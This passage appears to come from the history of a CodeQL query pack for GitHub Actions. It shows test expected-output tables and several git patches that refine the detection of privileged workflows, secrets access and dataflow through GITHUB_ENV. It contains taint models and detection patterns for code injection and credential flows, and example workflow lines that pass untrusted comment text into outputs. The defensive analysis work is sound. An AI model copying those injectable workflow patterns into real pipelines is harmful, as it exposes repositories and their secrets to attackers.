.github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -cfgNodes -| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/test.yml:1:1:40:53 | enter on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -dfNodes -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -argumentNodes -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -usesIds -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | -nodeLocations -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | -scopes -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/test.yml:1:1:40:53 | on: push | -sources -| ahmadnassri/action-changed-files | * | output.files | PR changed files | -| ahmadnassri/action-changed-files | * | output.json | PR changed files | -| amannn/action-semantic-pull-request | * | output.error_message | PR title | -| cypress-io/github-action | * | env.GH_BRANCH | PR branch | -| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | -| dorny/paths-filter | * | output.changes | PR changed files | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | -| jitterbit/get-changed-files | * | output.added | PR changed files | -| jitterbit/get-changed-files | * | output.added_modified | PR changed files | -| jitterbit/get-changed-files | * | output.all | PR changed files | -| jitterbit/get-changed-files | * | output.deleted | PR changed files | -| jitterbit/get-changed-files | * | output.modified | PR changed files | -| jitterbit/get-changed-files | * | output.removed | PR changed files | -| jitterbit/get-changed-files | * | output.renamed | PR changed files | -| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | -| marocchino/on_artifact | * | output.* | Downloaded artifact | -| octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | -| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | -| tj-actions/branch-names | * | output.current_branch | PR current branch | -| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | -| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | -| tj-actions/changed-files | * | output.added_files | PR changed files | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | -| tj-actions/changed-files | * | output.all_changed_files | PR changed files | -| tj-actions/changed-files | * | output.all_modified_files | PR changed files | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | -| tj-actions/changed-files | * | output.changed_keys | PR changed files | -| tj-actions/changed-files | * | output.copied_files | PR changed files | -| tj-actions/changed-files | * | output.deleted_files | PR changed files | -| tj-actions/changed-files | * | output.modified_files | PR changed files | -| tj-actions/changed-files | * | output.modified_keys | PR changed files | -| tj-actions/changed-files | * | output.other_changed_files | PR changed files | -| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | -| tj-actions/changed-files | * | output.other_modified_files | PR changed files | -| tj-actions/changed-files | * | output.renamed_files | PR changed files | -| tj-actions/changed-files | * | output.type_changed_files | PR changed files | -| tj-actions/changed-files | * | output.unknown_files | PR changed files | -| tj-actions/changed-files | * | output.unmerged_files | PR changed files | -| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | -| trilom/file-changes-action | * | output.files | PR changed files | -| trilom/file-changes-action | * | output.files_added | PR changed files | -| trilom/file-changes-action | * | output.files_modified | PR changed files | -| trilom/file-changes-action | * | output.files_removed | PR changed files | -| tzkhan/pr-update-action | * | output.headMatch | | -| xt0rted/slash-command-action | * | output.command-arguments | | -summaries -| akhileshns/heroku-deploy | * | input.branch | output.status | taint | -| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | -| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | -| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | -| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | -| ashley-taylor/regex-property-action | * | input.value | output.value | taint | -| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | -| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | -| aszc/change-string-case-action | * | input.string | output.capitalized | taint | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | -| bobheadxi/deployments | * | input.env | output.env | taint | -| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | -| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | -| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | -| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | -| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | -| csexton/release-asset-action | * | input.release-url | output.url | taint | -| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | -| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | -| frabert/replace-string-action | * | input.string | output.replaced | taint | -| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | -| getsentry/action-release | * | input.version | output.version | taint | -| getsentry/action-release | * | input.version_prefix | output.version | taint | -| github/codeql-action | * | input.output | output.sarif-output | taint | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | -| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | -| haya14busa/action-cond | * | input.if_false | output.value | taint | -| haya14busa/action-cond | * | input.if_true | output.value | taint | -| hexlet/project-action | * | input.mount-path | env.PWD | taint | -| jsdaniell/create-json | * | input.dir | output.successfully | taint | -| jsdaniell/create-json | * | input.json | output.successfully | taint | -| jsdaniell/create-json | * | input.name | output.successfully | taint | -| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | -| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | -| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | -| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | -| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | -| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | -| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | -| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | -| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | -| octo-org/summary-repo/.github/workflows/workflow.yml | * | input.config-path | output.workflow-output | taint | -| octo-org/this-repo/.github/workflows/workflow.yml | * | input.config-path | output.workflow-output | taint | -| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | -| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | -| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | -| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | -| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | -| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | -| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | -calls -| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | -needs -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -testNormalizeExpr -| foo['bar'] == baz | foo.bar == baz | -| github.event.pull_request.user["login"] | github.event.pull_request.user.login | -| github.event.pull_request.user['login'] | github.event.pull_request.user.login | -| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | -writeToGitHubEnv -| id1 | $( Date: Thu, 11 Apr 2024 16:23:51 +0200 Subject: [PATCH 0168/1267] Improve privleged workflow detection --- ql/lib/codeql/actions/Ast.qll | 17 ++++++++++++-- ql/lib/codeql/actions/ast/internal/Ast.qll | 23 +++++++++++++++++++ ql/src/Security/CWE-829/ArtifactPoisoning.ql | 2 +- .../CWE-094/.github/workflows/simple3.yml | 2 +- 4 files changed, 40 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index cf5b63399f0..91ee95a90ab 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -20,7 +20,7 @@ module Utils { } bindingset[str] - string trimQuotes(string str) { + private string trimQuotes(string str) { result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") } @@ -212,6 +212,13 @@ class Workflow extends AstNode instanceof WorkflowImpl { } predicate isPrivileged() { + // The Workflow has a permission to write to some scope + this.getPermissions().getAPermission() = "write" and + // The Workflow accesses a secret + exists(SecretsExpression expr | + expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + or // The Workflow is triggered by an event other than `pull_request` not this.hasSingleTrigger("pull_request") or @@ -248,7 +255,11 @@ class Outputs extends AstNode instanceof OutputsImpl { override string toString() { result = "Job outputs node" } } -class Permissions extends AstNode instanceof PermissionsImpl { } +class Permissions extends AstNode instanceof PermissionsImpl { + string getPermission(string perm) { result = super.getPermission(perm) } + + string getAPermission() { result = super.getAPermission() } +} class Strategy extends AstNode instanceof StrategyImpl { Expression getMatrixVarExpr(string varName) { result = super.getMatrixVarExpr(varName) } @@ -348,6 +359,8 @@ abstract class SimpleReferenceExpression extends AstNode instanceof SimpleRefere AstNode getTarget() { result = super.getTarget() } } +class SecretsExpression extends SimpleReferenceExpression instanceof SecretsExpressionImpl { } + class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { string getStepId() { result = super.getStepId() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index bba5c1a47d3..300377536d6 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -484,6 +484,10 @@ class PermissionsImpl extends AstNodeImpl, TPermissionsNode { override Location getLocation() { result = n.getLocation() } override YamlMapping getNode() { result = n } + + string getPermission(string perm) { result = n.lookup(perm).(YamlScalar).getValue() } + + string getAPermission() { result = this.getPermission(_) } } class StrategyImpl extends AstNodeImpl, TStrategyNode { @@ -851,6 +855,25 @@ private string inputsCtxRegex() { Utils::wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) } +private string secretsCtxRegex() { result = Utils::wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } + +/** + * Holds for an expression accesing the `secrets` context. + * e.g. `${{ secrets.FOO }}` + */ +class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { + string fieldName; + + SecretsExpressionImpl() { + Utils::normalizeExpr(expression).regexpMatch(secretsCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(secretsCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { none() } +} + /** * Holds for an expression accesing the `steps` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 6d3910e2ca5..19b007902bd 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -4,7 +4,7 @@ * @kind path-problem * @problem.severity warning * @precision high - * @security-severity 9.3 + * @security-severity 5.0 * @id actions/artifact-poisoning * @tags actions * security diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml index be1559d4711..3128aacc93c 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml @@ -8,7 +8,7 @@ on: permissions: actions: read checks: read - contents: read + contents: write jobs: echo_trigger: From 29cef4fd7358cf329d111cd616cff2611b59097c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Apr 2024 16:24:51 +0200 Subject: [PATCH 0169/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index aa02154bab1..f5b3952ce96 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.9 +version: 0.0.10 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 134b0db2b17..7c1cc78df4a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.9 +version: 0.0.10 groups: - actions - queries From 2925380e72bdc2174b33db84e5a5c12d6cc7982e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Apr 2024 16:27:40 +0200 Subject: [PATCH 0170/1267] Remove dummy models --- ql/lib/ext/TEST-RW-MODELS.model.yml | 17 ----------------- 1 file changed, 17 deletions(-) delete mode 100644 ql/lib/ext/TEST-RW-MODELS.model.yml diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml deleted file mode 100644 index 65952bccb35..00000000000 --- a/ql/lib/ext/TEST-RW-MODELS.model.yml +++ /dev/null @@ -1,17 +0,0 @@ -extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: summaryModel - data: - - ["octo-org/this-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint", "manual"] - - ["octo-org/summary-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint", "manual"] - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sourceModel - data: - - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "Foo", "manual"] - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sinkModel - data: - - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "code-injection", "manual"] From db86c40c5066cfb211926b4715741af6841c885c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Apr 2024 13:07:40 +0200 Subject: [PATCH 0171/1267] Enable dataflow through GITHUB_ENV vars --- ql/lib/codeql/actions/Ast.qll | 4 +- ql/lib/codeql/actions/ast/internal/Ast.qll | 3 + .../codeql/actions/dataflow/FlowSources.qll | 2 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 90 +-- .../dataflow/internal/DataFlowPrivate.qll | 14 +- .../security/ArtifactPoisoningQuery.qll | 16 +- .../actions/security/EnvVarInjectionQuery.qll | 2 +- .../.github/workflows/multiline.yml | 40 +- ql/test/library-tests/test.expected | 523 +++++++++++++++++- .../CWE-077/.github/workflows/test4.yml | 17 +- .../Security/CWE-077/EnvVarInjection.expected | 6 + .../PrivilegedEnvVarInjection.expected | 8 + .../Security/CWE-094/CodeInjection.expected | 4 +- .../CWE-094/PrivilegedCodeInjection.expected | 4 +- 14 files changed, 656 insertions(+), 77 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 91ee95a90ab..edee4d03eb4 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -25,7 +25,7 @@ module Utils { } bindingset[line, var] - private predicate extractLineAssignment(string line, string var, string key, string value) { + predicate extractLineAssignment(string line, string var, string key, string value) { exists(string assignment | // single line assignment assignment = @@ -59,7 +59,7 @@ module Utils { } bindingset[script, var] - private predicate extractMultilineAssignment(string script, string var, string key, string value) { + predicate extractMultilineAssignment(string script, string var, string key, string value) { // multiline assignment exists(string flattenedScript | flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 300377536d6..a66befe7d7d 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1010,6 +1010,9 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { s.getInScopeEnvVarExpr(fieldName) = result and s.getAChildNode*() = this ) + or + // Some Run steps may store taint in the enclosing job so we need to check the enclosing job + result = this.getEnclosingJob() } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 01aa8bbc320..c937aaa550b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -170,7 +170,7 @@ private class CompositeActionInputSource extends RemoteFlowSource { * A downloadeded artifact. */ private class ArtifactToOptionSource extends RemoteFlowSource { - ArtifactToOptionSource() { this.asExpr() instanceof ArtifactDownloadStep } + ArtifactToOptionSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "Step output from Artifact" } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 3988f2190ab..4e049615045 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -22,28 +22,6 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -/** - * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. - * e.g. - * - name: Extract and Clean Initial URL - * id: extract-url - * env: - * BODY: ${{ github.event.comment.body }} - * run: | - * echo "::set-output name=foo::$BODY" - * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT - * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" - */ -predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string varName, string key, string value | - c = any(DataFlow::FieldContent ct | ct.getName() = key.replaceAll("output\\.", "")) and - run.getInScopeEnvVarExpr(varName) = pred.asExpr() and - Utils::writeToGitHubOutput(run, key, value) and - value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and - succ.asExpr() = run - ) -} - /** * Holds if a Run step declares an environment variable, uses it in its script to set another env var. * e.g. @@ -65,35 +43,79 @@ class EnvToRunTaintStep extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) } } +/** + * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. + * e.g. + * - name: Extract and Clean Initial URL + * id: extract-url + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "::set-output name=foo::$BODY" + * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT + * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" + */ +predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Run run, string varName, string key, string value | + c = any(DataFlow::FieldContent ct | ct.getName() = key) and + pred.asExpr() = run.getInScopeEnvVarExpr(varName) and + succ.asExpr() = run and + Utils::writeToGitHubOutput(run, key, value) and + value.matches("%$" + ["", 